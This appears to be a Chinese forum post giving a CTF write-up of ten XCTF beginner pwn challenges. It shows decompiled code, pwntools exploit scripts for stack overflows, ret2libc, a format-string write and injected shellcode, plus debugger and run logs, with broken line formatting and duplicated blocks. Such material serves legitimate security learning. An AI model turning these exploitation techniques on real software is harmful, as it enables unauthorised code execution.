-
-
[原创]XCTF攻防世界-pwn新手练习区全部十题解析
-
发表于: 2021-5-14 00:34 14392
-
最近在看《CTF权威指南-pwn篇》,有时候一个题目觉得看懂了exp和知识点,实际上感受不深可能过几天全忘了。所以我选择做真题加深知识的理解。这里,使用攻防世界的所有pwn新手题来温习一些基本的利用方式。
p.s. 攻防世界创建在线场景一直失败,真是醉了
主要逻辑如下:
典型的ret2win,变量位于.bss段:
直接溢出获取flag:
因为是使用小端序比较数据,所以需要反转下字符串。第一题简单是预想之内的情况,不知道接下来是什么难度。
简单栈溢出,主要流程如下:
这里直接ret2到具体调用system的地方:
脚本:
题目提示rop,然而我直接ret2libc:
脚本如下:
看了下其他人写的wp,似乎rop提示对应的是x64版本的程序,因为x64环境下的传参方式从栈传递变成了寄存器rdi,rsi,rcx,rdx,r8,r9传参,所以调用system时需要特殊gadget(pop rdi)将字符串/bin/sh赋给rdi的形式构造参数。
程序流程比较长,这里笔者长话短说简单阐述下程序情况;首先有个alarm会结束程序运行,使用sed -i s/alarm/isnan/g ./1d3c852354df4609bf8e56fe8e9df316
将其直接替换掉1。
安全机制如下:
嗯保护很全,程序最后mmap了一段内存让我们输入然后跳过去执行:
需要使用它的格式化字符串漏洞将堆上的首个数据设置成0x55:
在调试中调用printf时栈情况如下:
栈中第二个参数为之前输入的地址数据,那么在x64环境中使用"%7$n"去定位Heap[0],py如下:
这题很简单:
程序从/dev/urandom2中取出随机数作为种子,生成十个随机数让我们猜测,猜对十个随机数即可获胜。这里有一个知识点是当seed固定时,之后生成的随机数都是一样的:
可以观察下面的输出:
从而我们可以利用程序的缓冲区溢出覆盖掉seed的值:
脚本如下:
效果:
题目关键点如下:
有个巨大问题是居然使用al赋给变量值:
所以这可以利用整数溢出的方式,构造261个长度的密码并调试到这一行指令:
构造py:
效果:
程序关键点如下:
gets存在栈溢出危险,我们直接ret到pwn函数中的call system,借用name作为参数'/bin/sh',编写py:
额和名字一样运行就拿shell了:
这题目《ctf竞赛权威指南》上有很相似的例子(page 80),总之就是泄露libc的地址,然后再调用system:
这里参考了大佬的博文更换程序libc3,但运行时还是会报错,索性直接把libc换了然后动态加载器执行:
然后用我的exp就成功执行了,反正可以模拟远程连接的环境也就行了:
一个典型的字符串格式化漏洞,需要我们修改某个变量的值:
gdb调试:
在第十个位置上存放我们的字符串,据此编写exp:
__int64 __fastcall main(__int64 a1, char
*
*
a2, char
*
*
a3)
{
alarm(
0x3Cu
);
setbuf(stdout,
0LL
);
puts(
"~~ welcome to ctf ~~ "
);
puts(
"lets get helloworld for bof"
);
read(
0
, &Buf_601068,
0x10uLL
);
if
( target_60106C
=
=
'nuaa'
)
sub_400686();
return
0LL
;
}
__int64 sub_400686()
{
system(
"cat flag.txt"
);
return
0LL
;
}
__int64 __fastcall main(__int64 a1, char
*
*
a2, char
*
*
a3)
{
alarm(
0x3Cu
);
setbuf(stdout,
0LL
);
puts(
"~~ welcome to ctf ~~ "
);
puts(
"lets get helloworld for bof"
);
read(
0
, &Buf_601068,
0x10uLL
);
if
( target_60106C
=
=
'nuaa'
)
sub_400686();
return
0LL
;
}
__int64 sub_400686()
{
system(
"cat flag.txt"
);
return
0LL
;
}
0000601068
?? Buf_601068 db ? ; ; DATA XREF: main
+
3B
↑o
.bss:
0000000000601069
?? db ? ;
.bss:
000000000060106A
?? db ? ;
.bss:
000000000060106B
?? db ? ;
.bss:
000000000060106C
?? ?? ?? ?? target_60106C dd ? ; DATA XREF: main
+
4A
↑r
0000601068
?? Buf_601068 db ? ; ; DATA XREF: main
+
3B
↑o
.bss:
0000000000601069
?? db ? ;
.bss:
000000000060106A
?? db ? ;
.bss:
000000000060106B
?? db ? ;
.bss:
000000000060106C
?? ?? ?? ?? target_60106C dd ? ; DATA XREF: main
+
4A
↑r
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ echo
'12345'
> flag.txt
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111nuaa
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111aaun
12345
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ echo
'12345'
> flag.txt
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111nuaa
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
4f2f44c9471d4dc2b59768779e378282
~~ welcome to ctf ~~
lets get helloworld
for
bof
1111aaun
12345
ssize_t vulnerable_function()
{
char buf;
/
/
[rsp
+
0h
] [rbp
-
80h
]
return
read(
0
, &buf,
0x200uLL
);
}
int
callsystem()
{
return
system(
"/bin/sh"
);
}
ssize_t vulnerable_function()
{
char buf;
/
/
[rsp
+
0h
] [rbp
-
80h
]
return
read(
0
, &buf,
0x200uLL
);
}
int
callsystem()
{
return
system(
"/bin/sh"
);
}
text:
0000000000400596
55
push rbp
.text:
0000000000400597
48
89
E5 mov rbp, rsp
.text:
000000000040059A
BF
84
06
40
00
mov edi, offset command ;
"/bin/sh"
<
-
-
-
-
-
-
.text:
000000000040059F
E8 BC FE FF FF call _system
.text:
00000000004005A4
5D
pop rbp
.text:
00000000004005A5
C3 retn
text:
0000000000400596
55
push rbp
.text:
0000000000400597
48
89
E5 mov rbp, rsp
.text:
000000000040059A
BF
84
06
40
00
mov edi, offset command ;
"/bin/sh"
<
-
-
-
-
-
-
.text:
000000000040059F
E8 BC FE FF FF call _system
.text:
00000000004005A4
5D
pop rbp
.text:
00000000004005A5
C3 retn
from
pwn
import
*
context.log_level
=
"DEBUG"
io
=
process(
'291721f42a044f50a2aead748d539df0'
)
win_function
=
0x40059A
payload
=
'A'
*
0x88
+
p64(win_function)
io.recv()
pwnlib.gdb.attach(io,gdbscript
=
'''
break *0x4005C5
c
'''
)
pause()
io.send(payload)
io.interactive()
from
pwn
import
*
context.log_level
=
"DEBUG"
io
=
process(
'291721f42a044f50a2aead748d539df0'
)
win_function
=
0x40059A
payload
=
'A'
*
0x88
+
p64(win_function)
io.recv()
pwnlib.gdb.attach(io,gdbscript
=
'''
break *0x4005C5
c
'''
)
pause()
io.send(payload)
io.interactive()
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1ab77c073b4f4524b73e086d063f884e
[
*
]
'/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
ssize_t vulnerable_function()
{
char buf;
/
/
[esp
+
0h
] [ebp
-
88h
]
system(
"echo Input:"
);
return
read(
0
, &buf,
0x100u
);
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1ab77c073b4f4524b73e086d063f884e
[
*
]
'/home/dc/playground/xctf_word/pwn/1ab77c073b4f4524b73e086d063f884e'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
ssize_t vulnerable_function()
{
char buf;
/
/
[esp
+
0h
] [ebp
-
88h
]
system(
"echo Input:"
);
return
read(
0
, &buf,
0x100u
);
}
from
pwn
import
*
context.log_level
=
"DEBUG"
io
=
process(
'./1ab77c073b4f4524b73e086d063f884e'
)
elf
=
ELF(
'./1ab77c073b4f4524b73e086d063f884e'
)
hit_binsh
=
0x804A024
payload
=
'A'
*
0x8C
+
p32(elf.sym[
'system'
])
+
'A'
*
4
+
p32(hit_binsh)
io.recv()
pwnlib.gdb.attach(io,gdbscript
=
'''
break *0x804847F
c
'''
)
pause()
io.send(payload)
io.interactive()
from
pwn
import
*
context.log_level
=
"DEBUG"
io
=
process(
'./1ab77c073b4f4524b73e086d063f884e'
)
elf
=
ELF(
'./1ab77c073b4f4524b73e086d063f884e'
)
hit_binsh
=
0x804A024
payload
=
'A'
*
0x8C
+
p32(elf.sym[
'system'
])
+
'A'
*
4
+
p32(hit_binsh)
io.recv()
pwnlib.gdb.attach(io,gdbscript
=
'''
break *0x804847F
c
'''
)
pause()
io.send(payload)
io.interactive()
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1d3c852354df4609bf8e56fe8e9df316
[
*
]
'/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
Arch: amd64
-
64
-
little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ pwn checksec
1d3c852354df4609bf8e56fe8e9df316
[
*
]
'/home/dc/playground/xctf_word/pwn/1d3c852354df4609bf8e56fe8e9df316'
Arch: amd64
-
64
-
little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (
0x400000
)
if
(
*
HEAP_1_D_2_U
=
=
HEAP_1_D_2_U[
1
] )
{
puts(
"Wizard: I will help you! USE YOU SPELL"
);
v1
=
mmap(
0LL
,
0x1000uLL
,
7
,
33
,
-
1
,
0LL
);
read(
0
, v1,
0x100uLL
);
(v1)(
0LL
, v1);
}
if
(
*
HEAP_1_D_2_U
=
=
HEAP_1_D_2_U[
1
] )
{
puts(
"Wizard: I will help you! USE YOU SPELL"
);
v1
=
mmap(
0LL
,
0x1000uLL
,
7
,
33
,
-
1
,
0LL
);
read(
0
, v1,
0x100uLL
);
(v1)(
0LL
, v1);
}
_isoc99_scanf(
"%ld"
, &v2);
puts(
"And, you wish is:"
);
_isoc99_scanf(
"%s"
, &
format
);
puts(
"Your wish is"
);
printf(&
format
, &
format
);
_isoc99_scanf(
"%ld"
, &v2);
puts(
"And, you wish is:"
);
_isoc99_scanf(
"%s"
, &
format
);
puts(
"Your wish is"
);
printf(&
format
, &
format
);
0x00007fffffffdb28
│
+
0x0000
:
0x0000000000400c83
→ mov edi,
0x401c23
← $rsp
0x00007fffffffdb30
│
+
0x0008
:
0x00000001f7dca2a0
0x00007fffffffdb38
│
+
0x0010
:
0x0000000000604260
→
0x0000005500000044
(
"D"
?)
0x00007fffffffdb40
│
+
0x0018
:
0x0000000078243125
(
"%1$x"
?) ← $rdi
0x00007fffffffdb48
│
+
0x0020
:
0x00007ffff7a6f4d3
→ <_IO_file_overflow
+
259
>
cmp
eax,
0xffffffff
0x00007fffffffdb50
│
+
0x0028
:
0x0000000000000022
("""?)
0x00007fffffffdb58
│
+
0x0030
:
0x00007ffff7dce760
→
0x00000000fbad2887
0x00007fffffffdb60
│
+
0x0038
:
0x0000000000401a68
→
"So, where you will go?east or up?:"
0x00007fffffffdb28
│
+
0x0000
:
0x0000000000400c83
→ mov edi,
0x401c23
← $rsp
0x00007fffffffdb30
│
+
0x0008
:
0x00000001f7dca2a0
0x00007fffffffdb38
│
+
0x0010
:
0x0000000000604260
→
0x0000005500000044
(
"D"
?)
0x00007fffffffdb40
│
+
0x0018
:
0x0000000078243125
(
"%1$x"
?) ← $rdi
0x00007fffffffdb48
│
+
0x0020
:
0x00007ffff7a6f4d3
→ <_IO_file_overflow
+
259
>
cmp
eax,
0xffffffff
0x00007fffffffdb50
│
+
0x0028
:
0x0000000000000022
("""?)
0x00007fffffffdb58
│
+
0x0030
:
0x00007ffff7dce760
→
0x00000000fbad2887
0x00007fffffffdb60
│
+
0x0038
:
0x0000000000401a68
→
"So, where you will go?east or up?:"
from
pwn
import
*
context.arch
=
"amd64"
context.log_level
=
"DEBUG"
io
=
process(
'./1d3c852354df4609bf8e56fe8e9df316'
)
io.recvuntil(
'secret[0] is '
)
secret1
=
int
(io.recvuntil(
'\n'
),
16
)
io.recvuntil(
'secret[1] is '
)
secret2
=
int
(io.recvuntil(
'\n'
),
16
)
log.info(
"%s %s"
%
(secret1,secret2))
io.recv()
io.sendline(
'noname'
)
io.recv()
io.sendline(
'east'
)
io.recv()
io.sendline(
'1'
)
io.recv()
#'Give me an address'
io.sendline(
str
(secret1))
io.recv()
io.sendline(
'%085d%7$n'
)
io.recv()
io.send(asm(shellcraft.sh()))
io.interactive()
from
pwn
import
*
context.arch
=
"amd64"
context.log_level
=
"DEBUG"
io
=
process(
'./1d3c852354df4609bf8e56fe8e9df316'
)
io.recvuntil(
'secret[0] is '
)
secret1
=
int
(io.recvuntil(
'\n'
),
16
)
io.recvuntil(
'secret[1] is '
)
secret2
=
int
(io.recvuntil(
'\n'
),
16
)
log.info(
"%s %s"
%
(secret1,secret2))
io.recv()
io.sendline(
'noname'
)
io.recv()
io.sendline(
'east'
)
io.recv()
io.sendline(
'1'
)
io.recv()
#'Give me an address'
io.sendline(
str
(secret1))
io.recv()
io.sendline(
'%085d%7$n'
)
io.recv()
io.send(asm(shellcraft.sh()))
io.interactive()
__int64 __fastcall main(__int64 a1, char
*
*
a2, char
*
*
a3)
{
int
input_num;
/
/
[rsp
+
4h
] [rbp
-
3Ch
]
int
index;
/
/
[rsp
+
8h
] [rbp
-
38h
]
int
rand_num;
/
/
[rsp
+
Ch] [rbp
-
34h
]
char name;
/
/
[rsp
+
10h
] [rbp
-
30h
]
unsigned
int
seed[
2
];
/
/
[rsp
+
30h
] [rbp
-
10h
]
unsigned __int64 v9;
/
/
[rsp
+
38h
] [rbp
-
8h
]
v9
=
__readfsqword(
0x28u
);
setbuf(stdin,
0LL
);
setbuf(stdout,
0LL
);
setbuf(stderr,
0LL
);
input_num
=
0
;
rand_num
=
0
;
*
seed
=
sub_BB0();
puts(
"-------------------------------"
);
puts(
"Welcome to a guess number game!"
);
puts(
"-------------------------------"
);
puts(
"Please let me know your name!"
);
printf(
"Your name:"
,
0LL
);
gets(&name);
srand(seed[
0
]);
for
( index
=
0
; index <
=
9
;
+
+
index )
{
rand_num
=
rand()
%
6
+
1
;
printf(
"-------------Turn:%d-------------\n"
, (index
+
1
));
printf(
"Please input your guess number:"
);
__isoc99_scanf(
"%d"
, &input_num);
puts(
"---------------------------------"
);
if
( input_num !
=
rand_num )
{
puts(
"GG!"
);
exit(
1
);
}
puts(
"Success!"
);
}
win_C3E();
return
0LL
;
}
__int64 sub_BB0()
{
int
fd;
/
/
[rsp
+
Ch] [rbp
-
14h
]
__int64 buf;
/
/
[rsp
+
10h
] [rbp
-
10h
]
unsigned __int64 v3;
/
/
[rsp
+
18h
] [rbp
-
8h
]
v3
=
__readfsqword(
0x28u
);
fd
=
open
(
"/dev/urandom"
,
0
);
if
( fd <
0
|| read(fd, &buf,
8uLL
) <
0
)
exit(
1
);
if
( fd >
0
)
close(fd);
return
buf;
}
__int64 sub_C3E()
{
printf(
"You are a prophet!\nHere is your flag!"
);
system(
"cat flag"
);
return
0LL
;
}
__int64 __fastcall main(__int64 a1, char
*
*
a2, char
*
*
a3)
{
int
input_num;
/
/
[rsp
+
4h
] [rbp
-
3Ch
]
int
index;
/
/
[rsp
+
8h
] [rbp
-
38h
]
int
rand_num;
/
/
[rsp
+
Ch] [rbp
-
34h
]
char name;
/
/
[rsp
+
10h
] [rbp
-
30h
]
unsigned
int
seed[
2
];
/
/
[rsp
+
30h
] [rbp
-
10h
]
unsigned __int64 v9;
/
/
[rsp
+
38h
] [rbp
-
8h
]
v9
=
__readfsqword(
0x28u
);
setbuf(stdin,
0LL
);
setbuf(stdout,
0LL
);
setbuf(stderr,
0LL
);
input_num
=
0
;
rand_num
=
0
;
*
seed
=
sub_BB0();
puts(
"-------------------------------"
);
puts(
"Welcome to a guess number game!"
);
puts(
"-------------------------------"
);
puts(
"Please let me know your name!"
);
printf(
"Your name:"
,
0LL
);
gets(&name);
srand(seed[
0
]);
for
( index
=
0
; index <
=
9
;
+
+
index )
{
rand_num
=
rand()
%
6
+
1
;
printf(
"-------------Turn:%d-------------\n"
, (index
+
1
));
printf(
"Please input your guess number:"
);
__isoc99_scanf(
"%d"
, &input_num);
puts(
"---------------------------------"
);
if
( input_num !
=
rand_num )
{
puts(
"GG!"
);
exit(
1
);
}
puts(
"Success!"
);
}
win_C3E();
return
0LL
;
}
__int64 sub_BB0()
{
int
fd;
/
/
[rsp
+
Ch] [rbp
-
14h
]
__int64 buf;
/
/
[rsp
+
10h
] [rbp
-
10h
]
unsigned __int64 v3;
/
/
[rsp
+
18h
] [rbp
-
8h
]
v3
=
__readfsqword(
0x28u
);
fd
=
open
(
"/dev/urandom"
,
0
);
if
( fd <
0
|| read(fd, &buf,
8uLL
) <
0
)
exit(
1
);
if
( fd >
0
)
close(fd);
return
buf;
}
__int64 sub_C3E()
{
printf(
"You are a prophet!\nHere is your flag!"
);
system(
"cat flag"
);
return
0LL
;
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ cat ten_rand_nums_.c
#include <stdio.h>
#include <stdlib.h> /* srand, rand */
int
main(void)
{
srand(
0
);
for
(
int
index
=
0
; index !
=
10
; index
+
+
)
printf(
"%d "
,(rand()
%
6
+
1
));
return
0
;
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ cat ten_rand_nums_.c
#include <stdio.h>
#include <stdlib.h> /* srand, rand */
int
main(void)
{
srand(
0
);
for
(
int
index
=
0
; index !
=
10
; index
+
+
)
printf(
"%d "
,(rand()
%
6
+
1
));
return
0
;
}
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ gcc ten_rand_nums_.c
-
o ten_rand_nums
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ gcc ten_rand_nums_.c
-
o ten_rand_nums
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ .
/
ten_rand_nums
2
5
4
2
6
2
5
1
4
2
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$
-
0000000000000030
name db ?
-
000000000000002F
db ? ; undefined
-
000000000000002E
db ? ; undefined
-
000000000000002D
db ? ; undefined
-
000000000000002C
db ? ; undefined
-
000000000000002B
db ? ; undefined
-
000000000000002A
db ? ; undefined
-
0000000000000029
db ? ; undefined
-
0000000000000028
db ? ; undefined
-
0000000000000027
db ? ; undefined
-
0000000000000026
db ? ; undefined
-
0000000000000025
db ? ; undefined
-
0000000000000024
db ? ; undefined
-
0000000000000023
db ? ; undefined
-
0000000000000022
db ? ; undefined
-
0000000000000021
db ? ; undefined
-
0000000000000020
db ? ; undefined
-
000000000000001F
db ? ; undefined
-
000000000000001E
db ? ; undefined
-
000000000000001D
db ? ; undefined
-
000000000000001C
db ? ; undefined
-
000000000000001B
db ? ; undefined
-
000000000000001A
db ? ; undefined
-
0000000000000019
db ? ; undefined
-
0000000000000018
db ? ; undefined
-
0000000000000017
db ? ; undefined
-
0000000000000016
db ? ; undefined
-
0000000000000015
db ? ; undefined
-
0000000000000014
db ? ; undefined
-
0000000000000013
db ? ; undefined
-
0000000000000012
db ? ; undefined
-
0000000000000011
db ? ; undefined
-
0000000000000010
seed dd
2
dup(?)
-
0000000000000030
name db ?
-
000000000000002F
db ? ; undefined
-
000000000000002E
db ? ; undefined
-
000000000000002D
db ? ; undefined
-
000000000000002C
db ? ; undefined
-
000000000000002B
db ? ; undefined
-
000000000000002A
db ? ; undefined
-
0000000000000029
db ? ; undefined
-
0000000000000028
db ? ; undefined
-
0000000000000027
db ? ; undefined
-
0000000000000026
db ? ; undefined
-
0000000000000025
db ? ; undefined
-
0000000000000024
db ? ; undefined
-
0000000000000023
db ? ; undefined
-
0000000000000022
db ? ; undefined
-
0000000000000021
db ? ; undefined
-
0000000000000020
db ? ; undefined
-
000000000000001F
db ? ; undefined
-
000000000000001E
db ? ; undefined
-
000000000000001D
db ? ; undefined
-
000000000000001C
db ? ; undefined
-
000000000000001B
db ? ; undefined
-
000000000000001A
db ? ; undefined
-
0000000000000019
db ? ; undefined
-
0000000000000018
db ? ; undefined
-
0000000000000017
db ? ; undefined
-
0000000000000016
db ? ; undefined
-
0000000000000015
db ? ; undefined
-
0000000000000014
db ? ; undefined
-
0000000000000013
db ? ; undefined
-
0000000000000012
db ? ; undefined
-
0000000000000011
db ? ; undefined
-
0000000000000010
seed dd
2
dup(?)
from
pwn
import
*
context.log_level
=
"DEBUG"
nums
=
[
2
,
5
,
4
,
2
,
6
,
2
,
5
,
1
,
4
,
2
]
io
=
process(
'./b59204f56a0545e8a22f8518e749f19f'
)
io.recv()
io.sendline(
'A'
*
0x20
+
'\x00'
*
4
)
for
num
in
nums:
io.recv()
io.sendline(
str
(num))
io.recv()
from
pwn
import
*
context.log_level
=
"DEBUG"
nums
=
[
2
,
5
,
4
,
2
,
6
,
2
,
5
,
1
,
4
,
2
]
io
=
process(
'./b59204f56a0545e8a22f8518e749f19f'
)
io.recv()
io.sendline(
'A'
*
0x20
+
'\x00'
*
4
)
for
num
in
nums:
io.recv()
io.sendline(
str
(num))
io.recv()
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[
+
] Starting local process
'./b59204f56a0545e8a22f8518e749f19f'
argv
=
[
'./b59204f56a0545e8a22f8518e749f19f'
] : pid
5635
[DEBUG] Received
0x88
bytes:
'-------------------------------\n'
'Welcome to a guess number game!\n'
'-------------------------------\n'
'Please let me know your name!\n'
'Your name:'
[DEBUG] Sent
0x25
bytes:
00000000
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
│AAAA│AAAA│AAAA│AAAA│
*
00000020
00
00
00
00
0a
│····│·│
00000025
[DEBUG] Received
0x40
bytes:
'-------------Turn:1-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:2-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:3-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:4-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:5-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'6\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:6-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:7-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:8-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'1\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:9-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6c
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:10-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[
*
] Process
'./b59204f56a0545e8a22f8518e749f19f'
stopped with exit code
0
(pid
5635
)
[DEBUG] Received
0x5a
bytes:
'---------------------------------\n'
'Success!\n'
'You are a prophet!\n'
'Here is your flag!fake_flag\n'
dc@ubuntu:~
/
playground
/
xctf_word
/
pwn$ python payload_b59204f56a0545e8a22f8518e749f19f.py
[
+
] Starting local process
'./b59204f56a0545e8a22f8518e749f19f'
argv
=
[
'./b59204f56a0545e8a22f8518e749f19f'
] : pid
5635
[DEBUG] Received
0x88
bytes:
'-------------------------------\n'
'Welcome to a guess number game!\n'
'-------------------------------\n'
'Please let me know your name!\n'
'Your name:'
[DEBUG] Sent
0x25
bytes:
00000000
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
41
│AAAA│AAAA│AAAA│AAAA│
*
00000020
00
00
00
00
0a
│····│·│
00000025
[DEBUG] Received
0x40
bytes:
'-------------Turn:1-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:2-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:3-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:4-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:5-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'6\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:6-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:7-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'5\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:8-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'1\n'
[DEBUG] Received
0x6b
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:9-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'4\n'
[DEBUG] Received
0x6c
bytes:
'---------------------------------\n'
'Success!\n'
'-------------Turn:10-------------\n'
'Please input your guess number:'
[DEBUG] Sent
0x2
bytes:
'2\n'
[
*
] Process
'./b59204f56a0545e8a22f8518e749f19f'
stopped with exit code
0
(pid
5635
)
[DEBUG] Received
0x5a
bytes:
'---------------------------------\n'
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
赞赏
|
|
---|---|
|
level3怎么都不肯加载这个so
|
|
天堂猪 level3怎么都不肯加载这个so[em_9]我也是试了多次无法正确加载提供的so,猜想可能是因为动态加载器不匹配的原因。我觉得基于stack的pwn实战中只要能运行程序,提供的 libc不加载也行,我的exp里也只是用提供的so做了一些取偏移的操作。 |
- [原创][安全运维向]模拟搭建小型企业内网 14350
- 攻防世界-PWN-高手进阶区-难度3到4-全部题解 18861
- [原创]攻击格式化字符串在.bss段的程序(bugku-pwn6) 15274
- [原创]XCTF攻防世界-pwn新手练习区全部十题解析 14393
- [原创]KCTF2021 第二题 write up 5549